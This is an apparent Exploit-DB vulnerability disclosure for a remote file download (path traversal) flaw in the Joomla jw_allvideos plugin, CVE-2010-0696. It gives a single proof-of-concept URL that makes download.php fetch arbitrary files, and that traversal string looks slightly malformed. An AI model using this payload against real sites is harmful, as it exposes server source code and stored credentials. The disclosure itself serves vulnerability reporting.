Joomla (Jw_allVideos) Remote File Download Vulnerability

EDB-ID: 11447 CVE: 2010-0696 OSVDB-ID: 62331
Verified: Author: Pouya Daneshmand Published: 2010-02-14
Download Exploit: Source Raw Download Vulnerable App: N/A
#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Joomla (jw_allvideos Plugin)
# Version: 1.0
#################################################################
# Vulnerability Info:
# Type: Remote File Download
# Risk: Medium
#################################################################
# Vulnerability:
# http://site.com/plugins/content/jw_allvideos/includes/download.php?file=./../.../file.php
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################